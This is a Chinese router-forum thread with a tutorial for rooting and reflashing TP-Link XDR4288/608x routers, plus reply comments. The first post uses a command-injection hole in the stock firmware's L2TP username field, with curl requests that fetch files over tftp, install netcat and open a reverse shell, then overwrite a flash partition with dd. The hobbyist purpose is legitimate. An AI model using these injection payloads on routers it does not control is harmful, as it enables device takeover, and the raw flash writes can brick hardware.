TP-Link TL-XDR4288/608x 免拆刷机教程

无名游客 · 发表于 2023-2-14 16:19

本帖最后由无名游客于 2023-5-18 18:06 编辑

我个人还是很喜欢 XDR6086 的，双 2.5G 加 usb 3.2，这不薄纱某米。话不多说，这就放教程：

1. 首先打开原厂固件的后台界面，按 F12 打开开发者模式，记下当前的 stok，如图所示：
http://192.168.1.1/stok=<stok>/ds，stok 复制出来下面要用

2. 利用原厂 virtual** 的 L2TP 服务器漏洞执行注入命令
命令会在状态关闭时执行，执行完记得把当前命令删除

op 论坛那边用的是 U 盘：https://openwrt.org/inbox/toh/tp-link/xdr-6086#rooting
这里我是使用 WSL 发送 curl 命令执行操作，tftp 传输文件，你们自己看着参考：
假设你的电脑 IP 是 192.168.1.100，根据实际情况替换 IP 和 <stok>
将 netcat.ipk 和 xdr608x-bl2.bin、xdr608x-fip.bin 放到 tftpd64 目录下

curl -H "Content-Type: application/json" -X POST -d '{"virtual**":{"table":"user","para":{"username":";tftp -g -l netcat.ipk -r netcat.ipk 192.168.1.100 &","password":"password1","type":"l2tp","netmode":"client2lan","localip":"192.168.2.1","dns":"1.1.1.1","block":"0","ippool":"new","maxsessions":"1"},"name":"user_1"},"method":"add"}' http://192.168.1.1/stok=<stok>/ds
curl -H "Content-Type: application/json" -X POST -d '{"virtual**":{"table":"user","para":{"username":";opkg install netcat.ipk &","password":"password1","type":"l2tp","netmode":"client2lan","localip":"192.168.2.1","dns":"1.1.1.1","block":"0","ippool":"new","maxsessions":"1"},"name":"user_1"},"method":"add"}' http://192.168.1.1/stok=<stok>/ds

复制代码

这里我们已经安装好 netcat 了，另开一个终端窗口执行：

nc -nlvp 4444

复制代码

在原来的窗口继续执行如下命令打开 nc 连接：

curl -H "Content-Type: application/json" -X POST -d '{"virtual**":{"table":"user","para":{"username":";netcat -e /bin/sh 192.168.1.100 4444 &","password":"password1","type":"l2tp","netmode":"client2lan","localip":"192.168.2.1","dns":"1.1.1.1","block":"0","ippool":"new","maxsessions":"1"},"name":"user_1"},"method":"add"}' http://192.168.1.1/stok=<stok>/ds

复制代码

类似这样就是连接成功了：

接下来就是上传不死了，在原来的窗口继续执行：

curl -H "Content-Type: application/json" -X POST -d '{"virtual**":{"table":"user","para":{"username":";tftp -g -l xdr608x-bl2.bin -r xdr608x-bl2.bin 192.168.1.100 &","password":"password1","type":"l2tp","netmode":"client2lan","localip":"192.168.2.1","dns":"1.1.1.1","block":"0","ippool":"new","maxsessions":"1"},"name":"user_1"},"method":"add"}' http://192.168.1.1/stok=<stok>/ds
curl -H "Content-Type: application/json" -X POST -d '{"virtual**":{"table":"user","para":{"username":";tftp -g -l xdr608x-fip.bin -r xdr608x-fip.bin 192.168.1.100 &","password":"password1","type":"l2tp","netmode":"client2lan","localip":"192.168.2.1","dns":"1.1.1.1","block":"0","ippool":"new","maxsessions":"1"},"name":"user_1"},"method":"add"}' http://192.168.1.1/stok=<stok>/ds

复制代码

现在切换到 nc 窗口，先输 ls 命令看看文件传上去没有，执行如下命令刷入：

dd bs=131072 conv=sync of=/dev/mtdblock9 if=xdr608x-bl2.bin
dd bs=131072 conv=sync of=/dev/mtdblock9 seek=28 if=xdr608x-fip.bin

复制代码

3. 拔电重启，网线接路由器的千兆口，电脑设置 192.168.1.x 的静态地址，浏览器打开 192.168.1.1，
根据机型选择我发的固件（squashfs-sysupgrade.bin）上传刷入，然后就是 enjoy 时间啦~

刷机要用的文件：https://url10.ctfile.com/d/40253010-54351986-056d0b?p=6923 (访问密码: 6923)

2023 年 5 月更新：
   1. 修复 2.5G 网口，添加无线硬件加速开关
   2. 添加 xdr4288 支持，不死通用，刷入对应名称的固件即可

注：1. 固件基于 lede 源码编译，并更新了无线组件
      追求信号的推荐开低信道 80MHz，mt76 的 160MHz 天天炸
   2. 不死（包括 360t7 的）不兼容官方 openwrt，这不是 bug

z54_007 · 发表于 2023-2-14 16:37

本帖最后由 z54_007 于 2023-2-14 16:40 编辑

暗云大佬牛批！！！（破音

77aa88 · 发表于 2023-2-14 16:37

感谢分享！！

佐须之男 · 发表于 2023-2-14 16:37

今天是情人节，参加佐大OpenWrt培训班有优惠哦，情人节有佐大陪伴你。

wife8023 · 发表于 2023-2-14 16:38

TP有2.5也垃圾还不如FTTR香

HugoYuan · 发表于 2023-2-14 16:38

来支持啦！！！！

2858104109 · 发表于 2023-2-14 16:39

暗云喵喵贴贴

1689726513 · 发表于 2023-2-14 16:39

暗云大佬牛批！！！（破音

tangdashen1996 · 发表于 2023-2-14 16:41

wife8023 发表于 2023-2-14 16:38
TP有2.5也垃圾还不如FTTR香

但凡了解fttr原理也不会说这种话

Dane_Z · 发表于 2023-2-14 16:44

fashionlsj · 发表于 2023-2-14 16:47

支持支持

happychina2008 · 发表于 2023-2-14 16:47

666
66

你逗你玩 · 发表于 2023-2-14 16:48

暗云！暗云！暗云！

laotang_0 · 发表于 2023-2-14 16:52

大佬，这个方法对TP6086或6088的原厂固件版本有要求吗？我前些日子把6088升级到了1.0.24版本.

Dane_Z · 发表于 2023-2-14 16:55

wife8023 发表于 2023-2-14 16:38
TP有2.5也垃圾还不如FTTR香

但凡你懂FTTR，你就知道局限性，也不会这么说了。

账号		自动登录	找回密码
密码			立即注册

TP-Link TL-XDR4288/608x 免拆刷机教程

本帖子中包含更多资源

评分

相关帖子

点评

点评

欢迎大家光临恩山无线论坛 1/1